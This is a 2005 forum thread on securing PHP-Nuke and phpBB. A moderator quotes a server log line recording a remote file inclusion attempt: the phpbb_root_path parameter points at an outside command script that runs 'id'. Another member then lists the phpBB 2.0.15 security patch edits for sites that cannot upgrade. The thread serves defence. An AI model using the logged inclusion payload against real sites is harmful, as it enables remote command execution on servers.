Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Sun May 29, 2005 1:52 pm Reply with quote

Found this just in my logs:



Code:
200.147.118.253 - - [27/May/2005:00:36:45 +0200] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://brservers.org.previewyoursite.com/hbr/cmd.gif?&cmd=id HTTP/1.1" 200 1980 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Sun May 29, 2005 1:59 pm Reply with quote

This has been fixed in phpbb 2.0.15 - Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
Susann
PostPosted: Thu Jun 02, 2005 2:24 pm Reply with quote

For those who can´t upgrade to 2.0.15 is there any other security fix Question
 
chatserv
Member Emeritus


Joined: May 02, 2003
Posts: 1389
Location: Puerto Rico

PostPosted: Thu Jun 02, 2005 4:28 pm Reply with quote

You can always upgrade manually but if for whatever reason you still don't feel like it you should at the very least apply these:

BBtoNuke 2.0.14 to BBtoNuke 2.0.15 Code Changes

These are the Changes from phpBB 2.0.14 to phpBB 2.0.15 summed up into a little Mod. This might be very helpful if you want to update your Board and have installed a bunch of Mods. Then it's normally easier to apply the Code Changes than to install all Mods again.

When you find a 'AFTER, ADD'-Statement, the Code have to be added after the last line quoted in the 'FIND'-Statement.
When you find a 'BEFORE, ADD'-Statement, the Code have to be added before the first line quoted in the 'FIND'-Statement.
When you find a 'REPLACE WITH'-Statement, the Code quoted in the 'FIND'-Statement have to be replaced completely with the quoted Code in the 'REPLACE WITH'-Statement.

  • modules/Forums/admin/admin_forums.php

  1. FIND - Line 236
    Code:
       if( $mode == "addforum" )
    
       {
          list($cat_id) = each($HTTP_POST_VARS['addforum']);

    AFTER, ADD
    Code:
          $cat_id = intval($cat_id);

  • modules/Forums/admin/admin_smilies.php

  1. FIND - Line 450
    Code:
          $smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];
    
             $smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url'] : $HTTP_GET_VARS['smile_url'];
             $smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];

    AFTER, ADD
    Code:
             $smile_code = trim($smile_code);
    
             $smile_url = trim($smile_url);
             $smile_emotion = trim($smile_emotion);

  • db/postgres7.php

  1. FIND - Line 126
    Code:
             $query = preg_replace('#(.*WHERE.*)(username|user_email|ban_email) = \'(.*)\'#ise', "\"\\1LOWER(\\2) = '\" . strtolower('\\3') . \"'\"", $query);

    REPLACE WITH
    Code:
    //         $query = preg_replace('#(.*WHERE.*)(username|user_email|ban_email) = \'(.*)\'#ise', "\"\\1LOWER(\\2) = '\" . strtolower('\\3') . \"'\"", $query);

  • modules/Forums/groupcp.php

  1. FIND - Line 340
    Code:
             if ( !($row = $db->sql_fetchrow($result)) )

    REPLACE WITH
    Code:
             if ( !($row = $db->sql_fetchrow($result)) || $row['is_auth_mod'] == 0 )

  • includes/bbcode.php

  1. FIND - Line 127
    Code:
    {
    
       global $lang, $bbcode_tpl;

    AFTER, ADD
    Code:
       $text = preg_replace('#(script|about|applet|activex|chrome):#is', "\\1:", $text);


  2. FIND - Line 197
    Code:
       // [img]image_url_here[/img] code..
    
       // This one gets first-passed..
       $patterns[] = "#\[img:$uid\](.*?)\[/img:$uid\]#si";

    REPLACE WITH
    Code:
       // [img]image_url_here[/img] code..
    
       // This one gets first-passed..
       $patterns[] = "#\[img:$uid\]([^?].*?)\[/img:$uid\]#i";


  3. FIND - Line 210
    Code:
       // [url=xxxx://www.phpbb.com]phpBB[/url] code..
    
       $patterns[] = "#\[url=([\w]+?://[^ \"\n\r\t<]*?)\](.*?)\[/url\]#is";
       $replacements[] = $bbcode_tpl['url3'];

       // [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
       $patterns[] = "#\[url=((www|ftp)\.[^ \"\n\r\t<]*?)\](.*?)\[/url\]#is";


    REPLACE WITH
    Code:
       // [url=xxxx://www.phpbb.com]phpBB[/url] code..
    
       $patterns[] = "#\[url=([\w]+?://[^ \"\n\r\t<]*?)\]([^?].*?)\[/url\]#i";
       $replacements[] = $bbcode_tpl['url3'];

       // [url=www.phpbb.com]phpBB[/url] code.. (no xxxx:// prefix).
       $patterns[] = "#\[url=((www|ftp)\.[^ \"\n\r\t<]*?)\]([^?].*?)\[/url\]#i";


  4. FIND - Line 619
    Code:
     */
    
    function make_clickable($text)
    {

    AFTER, ADD
    Code:
       $text = preg_replace('#(script|about|applet|activex|chrome):#is', "\\1:", $text);

  • includes/smtp.php

  1. FIND - Line 109
    Code:
       if( !$socket = fsockopen($board_config['smtp_host'], 25, $errno, $errstr, 20) )

    REPLACE WITH
    Code:
       if( !$socket = @fsockopen($board_config['smtp_host'], 25, $errno, $errstr, 20) )

  • includes/usercp_viewprofile.php

  1. FIND - Line 36
    Code:
    }
    
    $profiledata = get_userdata($HTTP_GET_VARS[POST_USERS_URL]);

    AFTER, ADD
    Code:
    if (!$profiledata)
    
    {
       message_die(GENERAL_MESSAGE, $lang['No_user_id_specified']);
    }

  • modules/Forums/viewtopic.php

  1. FIND - Line 1110
    Code:
          $message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . $highlight_match . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));

    REPLACE WITH
    Code:
          $message = str_replace('\"', '"', substr(@preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se', "@preg_replace('#\b(" . str_replace('\\', '\\\\', $highlight_match) . ")\b#i', '<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' . $message . '<'), 1, -1));

  • modules/Forums/admin/admin_ug_auth.php

  1. FIND - Line 553
    Code:
          message_die(GENERAL_MESSAGE, $message);
    
       }
    }
    else if ( ( $mode == 'user' && ( isset($HTTP_POST_VARS['username']) || $user_id ) ) || ( $mode == 'group' && $group_id ) )

    BEFORE, ADD
    Code:
          $sql = 'SELECT user_id FROM ' . USER_GROUP_TABLE . "
    
             WHERE group_id = $group_id";
          $result = $db->sql_query($sql);

          $group_user = array();
          while ($row = $db->sql_fetchrow($result))
          {
             $group_user[$row['user_id']] = $row['user_id'];
          }
          $db->sql_freeresult($result);

          $sql = "SELECT ug.user_id, COUNT(auth_mod) AS is_auth_mod
             FROM " . AUTH_ACCESS_TABLE . " aa, " . USER_GROUP_TABLE . " ug
             WHERE ug.user_id IN (" . implode(', ', $group_user) . ")
                AND aa.group_id = ug.group_id
                AND aa.auth_mod = 1
             GROUP BY ug.user_id";
          if ( !($result = $db->sql_query($sql)) )
          {
             message_die(GENERAL_ERROR, 'Could not obtain moderator status', '', __LINE__, __FILE__, $sql);
          }

          while ($row = $db->sql_fetchrow($result))
          {
             if ($row['is_auth_mod'])
             {
                unset($group_user[$row['user_id']]);
             }
          }
          $db->sql_freeresult($result);

          if (sizeof($group_user))
          {
             $sql = "UPDATE " . USERS_TABLE . "
                SET user_level = " . USER . "
                WHERE user_id IN (" . implode(', ', $group_user) . ")";
             if ( !($result = $db->sql_query($sql)) )
             {
                message_die(GENERAL_ERROR, 'Could not update user level', '', __LINE__, __FILE__, $sql);
             }
          }

  • includes/usercp_register.php

  1. FIND - Line 414
    Code:
             if (strtolower($username) != strtolower($userdata['username']))


    REPLACE WITH
    Code:
             if (strtolower($username) != strtolower($userdata['username']) || $mode == 'register')

 
View user's profile Send private message Visit poster's website
Susann
PostPosted: Fri Jun 03, 2005 2:49 pm Reply with quote

Thanks a lot for the step by step instruction and many thanks for spending your time.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©